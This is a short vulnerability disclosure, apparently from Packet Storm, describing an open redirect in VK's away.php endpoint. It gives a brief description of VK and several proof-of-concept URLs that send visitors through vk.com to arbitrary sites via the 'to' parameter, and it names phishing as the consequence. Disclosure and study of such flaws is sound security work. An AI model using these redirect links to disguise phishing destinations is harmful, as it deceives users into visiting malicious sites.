VK (social network) Open Redirect URL Redirector Abuse
# Exploit Title:VK (social network) Open Redirect URL Redirector Abuse
# *Vendor*: www.vk.com
# Author: Juan Carlos García
DESCRIPTION
VK (Originally VKontakte, Russian, is a European social network service popular among Russian-speaking users around the world. It is especially popular in Russia, Ukraine, Kazakhstan, Moldova, Belarus, and Israel. VK is a Facebook clone, with several common features, such as university exclusiveness of a network during its early stages, similar color, and similar features and functionality. VK is able to hold the position, the main countries, and successfully move ahead in Europe and America, despite efforts of the American network. Like other social networks, VK allows users to message contacts publicly or privately, create groups, public pages and events, share and tag images, audio and video, and play browser based games.
URL Redirector Abuse(Open Redirect)
PoC
An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
Consequences
Phising
Procedure:Open de link given above
http://vk.com/away.php?mt=8&to=http://hackingmadrid.blogspot.com
http://vk.com/away.php?locale=ru_RU&to=http://google.com/search?q=Hackingmadrid
http://vk.com/away.php?to=https://www.owasp.org/index.php/Open_redirect
http://vk.com/away.php?mt=8&post=-43583105_11&to=http://www.owasp.org
http://vk.com/away.php?feature=share&post=193_594&to=http://www.flickr.com/photos/bamboudjef/2954962665/
Packet Storm
http://packetstormsecurity.com/files/120107/VK-Social-Network-Open-Redirect.html
Special thanks: Raul Diaz, Javier Garcia, Ivan Sanchez